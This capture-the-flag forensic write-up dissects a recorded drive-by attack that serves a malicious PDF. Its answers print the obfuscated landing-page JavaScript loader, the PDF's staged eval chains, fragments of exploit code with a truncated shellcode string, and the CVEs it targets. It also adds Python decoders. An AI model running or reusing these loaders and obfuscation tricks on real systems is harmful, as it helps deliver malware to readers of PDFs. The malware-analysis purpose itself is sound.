Forensic - GetPDF
📜Scenario
PDF format is the de-facto standard in exchanging documents online. Such popularity, however, has also attracted cyber criminals in spreading malware to unsuspecting users. The ability to generate malicious pdf files to distribute malware is a functionality that has been built into many exploit kits. As users are less cautious about opening PDF files, the malicious PDF file has become quite a successful attack vector.
The network traffic captured in lala.pcap is related to a typical malicious PDF file attack, in which an unsuspecting user opens a compromised web page, which redirects the user’s web browser to the URL of a malicious PDF file. As the PDF plug-in of the browser opens the PDF, the unpatched version of Adobe Acrobat Reader is exploited and, as a result, downloads and silently installs malware on the user’s machine.
Q1 - How many URL path(s) are involved in this incident ?
$ tshark -r Malicious-Portable/lala.pcap -T fields -e "http.request.full_uri" | sort -u
http://blog.honeynet.org.my/favicon.ico
http://blog.honeynet.org.my/forensic_challenge
http://blog.honeynet.org.my/forensic_challenge/
http://blog.honeynet.org.my/forensic_challenge/fcexploit.pdf
http://blog.honeynet.org.my/forensic_challenge/getpdf.php
http://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe
Answer : 6
Q2 - What is the URL which contains the JS code ?
Using Wireshark we extract all the objects present in the capture :
File -> Export Objects -> HTTP
The following files are obtained :
'favicon(1).ico'  favicon.ico  fcexploit.pdf  forensic_challenge 'forensic_challenge(1)'  getpdf.php the_real_malware.exe
By analysing the forensic_challenge file we find the URL
$ cat forensic_challenge
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://blog.honeynet.org.my/forensic_challenge/">here</a>.</p>
<hr>
<address>Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch proxy_html/3.0.1 mod_ssl/2.2.14 OpenSSL/0.9.8k Server at blog.honeynet.org.my Port 80</address>
</body></html>
Answer : hxxp://blog.honeynet.org.my/forensic_challenge/
Q3 - What is the URL hidden in the JS code ?
To extract the JS script we locate the HTTP packet that delivers the page and follow its stream :
Right Click -> Follow -> HTTP Stream
<html>
<body>
<!--
ANYTHING written in this HTML file (the file itself or the code inside it) is solely for the purpose of Honeynet Project Forensic Challenge.
Any usage towards this file and its content are at your own risk.
The author will not be responsible if any of those brings harm to you or others.
This material is for training and educational purposes.
You have been warned.
-->
<script>
var DepanNegw = window;
var DexeTelae = -44;
DexeTelae += 45;
XayeZebah = 'nedajemac';
var GaDemee = 'e5vfqaIVblI5'.replace(/[5fqIVbI5]/g, '');
ZavevTa = 'fazemezarawaseb';
var MezRai = parseInt;
var DayahDet = 'zafezed lacet cetexet jevecakemahamaha febenep cafa fezebefe yelaxa xejarer hejefaqazedeka kebeneh petaqe zevexej jenewabahegehar jabevame bayap def vasefezetevamer nefelaba sezaxewe qajeqeme wet reyeqer magemefele xelawece denew jafelev haweqa kel vatabaser mag vejefama xeca canapevezejev benaper gezazevaja zeyaxaf wehekeh jecalava set senajaj re kameken bazafakaqewate zaralek yecele kak s hexebeka heha jeyeteg sase wayefewa tey gawewem wefaravavepayeke xedevec gavayedegeqer casehes watenanesajet jelagal payevexebe pejasep heqefagabexemew deheler vejegeca hece rafenadamenaxe jaz fex hekases pazetepajamelew cerasej nevayezabevepeke pex gey dac g dezaleza kekeqebe peyemaf sevanededa cefagey defef cexaqehe sebex galahal zadaxaran lava falamedejegase set law mefe wa mex ces nam j xaxaped gexeqageb feqeled daseze tehadeh zeheteyera xanahef wepahena xarakel gadazecaq tabexape dareq seje lejegagaxavade haf jaz cewe me cag kem fed h legefaz taw keyacah wefereweverewaze rapecame kas fagavev facez yefeley lareke seperene gav lece gahepegesafeve dez gen yeje s waz qas xap c hademax mezezah qepawehe vad zejates pe cehajeg sabebaseqeseda sekesav nebeda cagareg kec fexewel bejewagedegeqene bajesade lav pasepad baraj xecavan vedepe veranake vej heva kejajemacajada wez saj vele x qaj vad fag y qetamefe jaxa kamatare net zeheweh jeme bale cexebedeleneye dab vev kekaxex jetecajek lejekabe qalef bevegeye caxeb beleteqe r hele saxafexazat baz dehakajegeqeneke met mefepexafecebera qwertyu iop asdfghj klzxcvbnmqwer tyuiopa sdfghjklzxcvbnmq hjklzxc vbnmqwer tyu iopasdfghjklzxc vbnmqwe rtyuiopas dfghjkl zxcvbnmqwertyuio pasdfgh jklzxcvbnmqwert yuiopas dfghjk lzxcvbnm qwertyuiop asdfghj klzxcvbnmqwerty uiopasd fghjkl zxcvbnmq werty uio pasdfghjklzxcvb nmqwert yuiopasdfghjklzx cvbnmqwe rty uiopasd fghjklzx uio pasdfghjklzxcvb nmqwert uiopasdfghjklz qwertyui opasdfghjk xcr vbnmqwertyuiopar sdfghjr klzxcvr bnmqwer rtyuiopasdfghjkr lzxcvbnr mqr wertyur iopasr dfghjkr 
lzxcvbnmqwertyr uiopasdr fghr jklzxcr vbnmqwertr yuiopar sdfr ghjklr zxcvbnmqwertyuir opasdfr ghjr klzxcvr bnmqwertr yuiopar sr dfghjkr lzxcvbnmqwerr dfghjkr lzxcvbnmqwerr tyuiopr asdfgr hjklzxr cvbnmqwertyuior pasdfgr hjklzxcr vbnmqwr ertyur met mefepexafecebera xanahef wepahena feqeled daseze tabexape dareq zexelede l cefagey defef hademax mezezah req batekeqaheteceh zateyene c zekeqay ratevecek veheleqe k dec tec xece jefexazeqayefes cama bapevexeladet keh lanawebasegecaja qefejev qepetekene dacegas relevaj fecasece ber veyayes ba kajebed savaketegemeqe wepecer lamege tere ratavacevejezax gey dasalaje gav yepakekehe'.split(' ');
var ZeJexn = '';
var SerayYafags = String;
var KesXanavn = -50;
KesXanavn += 66;
XadHef = 78;
var BeZao = 47;
BeZao += -47;
var FeceSabejo = -46;
FeceSabejo += 48;
GebJep = 92;
var SeWajec = 'ftr9wogmBwJCW5h6aixrPRCs1ZonjHjdjKueMkD'.replace(/[t9wgBwJW56ixPRs1ZnjHjjKuMkD]/g, '');
MaqTa = 5;
GaDemee = DepanNegw[GaDemee];
SeWajec = SerayYafags[SeWajec];
for (YajMedei = BeZao; YajMedei <DayahDet.length - 1; YajMedei += FeceSabejo) ZeJexn += SeWajec(MezRai((DayahDet[YajMedei + BeZao].length - 1).toString(KesXanavn) + (DayahDet[YajMedei + DexeTelae].length - 1).toString(KesXanavn), KesXanavn));
GaDemee(ZeJexn); </script>
</body>
</html>
Answer : hxxp://blog.honeynet.org.my/forensic_challenge/getpdf.php
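The script above keeps its real payload in DayahDet: every word encodes one hex digit as (word length - 1), and each pair of words is one character code, while GaDemee and SeWajec become eval and String.fromCharCode once the noise characters are stripped. The Python below is an added example, not code from the original writeup or the challenge: it re-implements the decoder so the blob can be read without running the page's eval. The sample stage, the encode_word_lengths() helper and the host example.invalid are constructed here; to decode the real DayahDet, paste the whole quoted string (rejoining the line wrap introduced by the dump) into decode_word_lengths().

```python
"""Static decoder for the word-length obfuscation used by the landing page's
<script> (added example, not code from the original writeup).

The page's loop, with its numeric variables resolved, is:
    for (i = 0; i < words.length - 1; i += 2)
        out += String.fromCharCode(parseInt(
            (words[i].length - 1).toString(16) +
            (words[i + 1].length - 1).toString(16), 16));
so each word is one hex digit (length - 1) and two words make one character.
"""

RADIX = 16  # KesXanavn = -50 + 66 in the original script


def strip_noise(disguised: str, noise: str) -> str:
    """Mirror of  'xxx'.replace(/[noise]/g, '')  used to hide the API names."""
    return "".join(c for c in disguised if c not in noise)


def decode_word_lengths(blob: str) -> str:
    """Reproduce the decoding loop without passing the result to eval()."""
    # split() on any whitespace tolerates the line wrap a pcap/HTML dump may
    # have inserted; the original used split(' ') on a single-line string.
    words = blob.split()
    out = []
    for i in range(0, len(words) - 1, 2):
        hi = format(len(words[i]) - 1, "x")      # (length - 1).toString(16)
        lo = format(len(words[i + 1]) - 1, "x")
        out.append(chr(int(hi + lo, RADIX)))     # parseInt(hi + lo, 16)
    return "".join(out)


def encode_word_lengths(text: str, filler: str = "abcdefghijklmnop") -> str:
    """Build a blob that decode_word_lengths() turns back into `text`.
    Constructed helper for the self-contained demo; the page ships only the
    decoder."""
    words = []
    for ch in text:
        code = ord(ch)
        if code > 0xFF:
            raise ValueError("scheme only covers single-byte character codes")
        for digit in (code >> 4, code & 0xF):
            words.append(filler[: digit + 1])    # word length digit+1 -> digit
    return " ".join(words)


# Constructed sample: the decoded stage redirects the browser, as the real
# one does to getpdf.php; the host used here is a placeholder.
SAMPLE_STAGE = 'window.location = "hxxp://example.invalid/getpdf.php";'
SAMPLE_BLOB = encode_word_lengths(SAMPLE_STAGE)


if __name__ == "__main__":
    print(strip_noise("e5vfqaIVblI5", "5fqIVbI5"))                      # GaDemee
    print(strip_noise("ftr9wogmBwJCW5h6aixrPRCs1ZonjHjdjKueMkD",
                      "t9wgBwJW56ixPRs1ZnjHjjKuMkD"))                  # SeWajec
    print(decode_word_lengths(SAMPLE_BLOB))
```

The decoder concatenates the two hex strings exactly as the script does, so a word longer than 16 characters yields a two-digit hex string and a character code above 0xFF, which is what the original parseInt would also produce.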
Q4 - What is the MD5 hash of the PDF file contained in the packet ?
$ md5sum fcexploit.pdf
659cf4c6baa87b082227540047538c2a fcexploit.pdf
Answer : 659cf4c6baa87b082227540047538c2a
Q5 - How many object(s) are contained inside the PDF file ?
$ pdfid fcexploit.pdf
PDFiD 0.2.8 fcexploit.pdf
PDF Header: %PDF-1.3
obj 19
endobj 18
stream 5
endstream 5
xref 1
trailer 1
startxref 1
/Page 2
/Encrypt 0
/ObjStm 0
/JS 1
/JavaScript 1
/AA 0
/OpenAction 1
/AcroForm 1
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/EmbeddedFile 1
/XFA 1
/Colors > 2^24 0
Answer : 19
Q6 - How many filtering schemes are used for the object streams ?
$ pdf-parser fcexploit.pdf | grep -i filter
/Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
/Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
/Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
/Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
Answer : 4
Q7 - What is the number of the 'object stream' that might contain malicious JS code ?
$ pdf-parser fcexploit.pdf
obj 4 0
Type: /Action
Referencing: 5 0 R <- Reference to obj 5
<<
/Type /Action
/S /JavaScript
/JS 5 0 R <- JS script
>>
obj 5 0
Type:
Referencing:
Contains stream
<<
/Length 395
/Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
>>
Answer : 5
Q8 - Analyzing the PDF file. What 'object-streams' contain the JS code responsible for executing the shellcodes? The JS code is divided into two streams. Format: two numbers separated with ','. Put the numbers in ascending order
First we identify and dump all of the objects that carry a '/Filter' entry :
$ python2 pdf-parser.py --raw -o 7 -f fcexploit.pdf -d obj7
obj7: ASCII text, with very long lines (55971), with no line terminators (hex string)
$ python2 pdf-parser.py --raw -o 9 -f fcexploit.pdf -d obj9
obj9: ASCII text, with very long lines (65536), with no line terminators (formatted as ‘X_170987743**’)
$ python2 pdf-parser.py --raw -o 10 -f fcexploit.pdf -d obj10
(obj10 is formatted as ‘U_155bf62c9aU_7917ab39**’)
Note : with python3, pdf-parser fails to decompress the ASCII85 stream; with python2 it works.
We also extract obj 5, identified in Q7.
I use the JavaScript Beautify recipe in CyberChef to make it easier to read :
var SSS = null;
var SS = 'ev';
var $S = '';
$5 = 'in';
app.doc.syncAnnotScan();
S$ = 'ti';
if (app.plugIns.length != 0) {
var $$ = 0;
S$ += 'tl';
$5 += 'fo';
____SSS = app.doc.getAnnots({ nPage: 0 });
S$ += 'e';
$S = this.info.title;
}
var S5 = '';
if (app.plugIns.length > 3) {
SS += 'a';
var arr = $S.split(/U_155bf62c9aU_7917ab39/);
for (var $ = 1; $ < arr.length; $++) {
S5 += String.fromCharCode('0x' + arr[$]);
}
SS += 'l';
}
if (app.plugIns.length >= 2) {
app[SS](S5);
}
Analysing the JS script, we identify the variable SSS, which works on the annotations of the pages (app.doc.getAnnots).
After searching among the various objects of Type: Page or Pages,
we identify obj 3, which looks suspicious because it has 3 objects in Referencing :
obj 3 0
Type: /Page
Referencing: 6 0 R, 8 0 R, 2 0 R
<<
/Type /Page
/MediaBox [ 0 0 612 792 ]
/Annots [ 6 0 R 8 0 R ]
/Parent 2 0 R
>>
So we analyse obj 2, 6 and 8.
We notice that objects 6 and 8 are annotations whose /Subj entries reference objects 7 and 9,
two of the three objects identified with the /Filter flag at the beginning of our investigation :
obj 6 0
Type: /Annot
Referencing: 7 0 R
<<
/Type /Annot
/Subtype /Text
/Name /Comment
/Rect [ 200 250 300 320 ]
/Subj 7 0 R
>>
obj 8 0
Type: /Annot
Referencing: 9 0 R
<<
/Type /Annot
/Subtype /Text
/Name /Comment
/Rect [100 180 300 210 ]
/Subj 9 0 R
>>
In the second part of the obj 5 code, the variable arr splits the string using the same format found in Object 10. We can do the same for Object 10 :
$ sed 's/U_155bf62c9aU_7917ab39//g' obj10 | xxd -r -p > obj10.out
____SS = 1;
____$5 = ____SSS[____SS].subject;
____$S = 0;
____$ = ____$5.replace(/X_17844743X_170987743/g, '%');
____S5 = ____SSS[____$S].subject;
____$ += ____S5.replace(/89af50d/g, '%');
____$ = ____$.replace(/\n/, '');
____$ = ____$.replace(/\r/, '');
____S$ = unescape(____$);
app.eval(____S$);
The ‘replace‘ commands match the formatting in Object 9 and Object 7.
We can reformat using the same method :
$ sed 's/X_17844743X_170987743/%/g' obj9 | xxd -r -p > obj9.out
$ sed 's/89af50d/%/g' obj7 | xxd -r -p > obj7.out
$ cat obj9.out obj7.out >> fulloutput.out
var w = new String();
var c = app;
function s(yarsp, len) {
.....
}
var m = new String("");
function cG() {
var chunk_size, payload, nopsled;
.....
}
.....
function gX() {
var basicZ = '';
// notepad.exe payload
var shellcode = unescape("%uc931%u64b1 ..... %ubcae");
}
.....
var basicU = new Date();
this.updateO = false;
nO();
var mUpdate = function() {};
So when you merge obj 7 and 9 together you find the shellcode variable.
Answer : 7,9
Q9 - The JS code responsible for executing the exploit contains shellcodes that drop malicious executable files. What is the full path of malicious executable files after being dropped by the malware on the victim machine ?
We find 4 different versions of the shellcode in the JS code. We can use scdbg to emulate each version and see what happens when the shellcode runs. We notice that it calls the URLDownloadToFileA API and downloads the a.exe file.
Answer : C:\WINDOWS\system32\a.exe
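The three sed | xxd -r -p pipelines of Q8 (obj 10 first, then obj 9 and obj 7) and the %uXXXX shellcode strings that Q9 hands to scdbg can be handled in one script. The Python below is an added example, not code from the original writeup: it mirrors the split() of obj 5 and the replace()/unescape() logic of obj 10 using the separator and markers found in the file, and converts a %u-escaped string into the raw bytes an emulator takes. The sample inputs and the make_*_sample helpers are constructed here; with the real dumps you would read obj10, obj9 and obj7 from disk instead.

```python
"""Python equivalents of the sed | xxd -r -p steps used to unpack objects
10, 9 and 7, plus the %uXXXX conversion needed before emulating the gX()
shellcode (added example, not part of the original writeup)."""
import re

OBJ10_SEP = "U_155bf62c9aU_7917ab39"   # split() pattern in obj 5
OBJ9_MARK = "X_17844743X_170987743"    # replaced with '%' by the obj 10 stage
OBJ7_MARK = "89af50d"


def decode_obj10(raw: str, sep: str = OBJ10_SEP) -> str:
    """Mirror of obj 5: split on sep, skip element 0 (its loop starts at 1),
    and treat every element as a hex character code ('0x' + arr[$])."""
    return "".join(chr(int(p, 16)) for p in raw.split(sep)[1:] if p)


def js_unescape(s: str) -> str:
    """JavaScript unescape(): %uXXXX -> UTF-16 code unit, %XX -> byte value;
    anything else passes through untouched."""
    return re.sub(
        r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
        lambda m: chr(int(m.group(1) or m.group(2), 16)),
        s,
    )


def decode_marked(raw: str, marker: str) -> str:
    """Mirror of the obj 10 stage: restore '%' in place of the marker, strip
    the first LF and CR (the original replace() calls have no g flag) and
    unescape the result."""
    s = raw.replace(marker, "%")
    s = s.replace("\n", "", 1).replace("\r", "", 1)
    return js_unescape(s)


def reassemble_stage2(obj9: str, obj7: str) -> str:
    """Obj 10 decodes obj 9 first and appends obj 7 before calling app.eval()."""
    return decode_marked(obj9, OBJ9_MARK) + decode_marked(obj7, OBJ7_MARK)


def shellcode_to_bytes(escaped: str) -> bytes:
    """Turn a %uXXXX/%XX string (the form of the shellcode variable in gX())
    into raw little-endian bytes, the input an emulator such as scdbg takes."""
    out = bytearray()
    for m in re.finditer(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", escaped):
        if m.group(1):
            out += int(m.group(1), 16).to_bytes(2, "little")
        else:
            out.append(int(m.group(2), 16))
    return bytes(out)


# --- constructed samples (not the real challenge objects) -------------------
def make_obj10_sample(code: str) -> str:
    """Encode text the way obj 10 stores it: separator + two hex digits per char."""
    return "".join(f"{OBJ10_SEP}{ord(c):02x}" for c in code)


def make_marked_sample(code: str, marker: str) -> str:
    """Encode text as percent-escaped hex with every '%' replaced by the marker."""
    return "".join(f"{marker}{ord(c):02x}" for c in code)


if __name__ == "__main__":
    print(decode_obj10(make_obj10_sample("app.eval(stage2);")))
    print(reassemble_stage2(make_marked_sample("var w = new String();\n", OBJ9_MARK),
                            make_marked_sample("nO();", OBJ7_MARK)))
    print(shellcode_to_bytes("%uc931%u64b1").hex())   # first bytes of the gX() shellcode
```

decode_marked() keeps the single-occurrence semantics of the original replace(/\n/, '') calls on purpose: reproducing the decoder exactly, rather than stripping every newline, is what guarantees the recovered stage matches what Reader would have evaluated.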
Q10 - The PDF file contains another exploit related to CVE-2010-0188. What is the URL of the malicious executable that the shellcode associated with this exploit drop ?
When extracting the URLs in Q1, we identified the URL hxxp://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe
In addition, when exporting the objects from the Wireshark capture, we obtained the file "the_real_malware.exe", which confirms the URL.
Answer : hxxp://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe
Q11 - How many CVEs are included in the PDF file ?
CVE-2009-0927 -> function updateE -> Adobe – ‘Collab.getIcon()’ Local Buffer Overflow (Metasploit)
CVE-2007-5659 -> function gX -> Adobe – ‘Collab.collectEmailInfo()’ Local Buffer Overflow
CVE-2008-2992 -> function cN -> Adobe Reader – ‘util.printf()’ JavaScript Function Stack Overflow
CVE-2009-4324 -> function cG -> Adobe – ‘Doc.media.newPlayer’ Use-After-Free
Together with CVE-2010-0188 from Q10, that makes five.
Answer : 5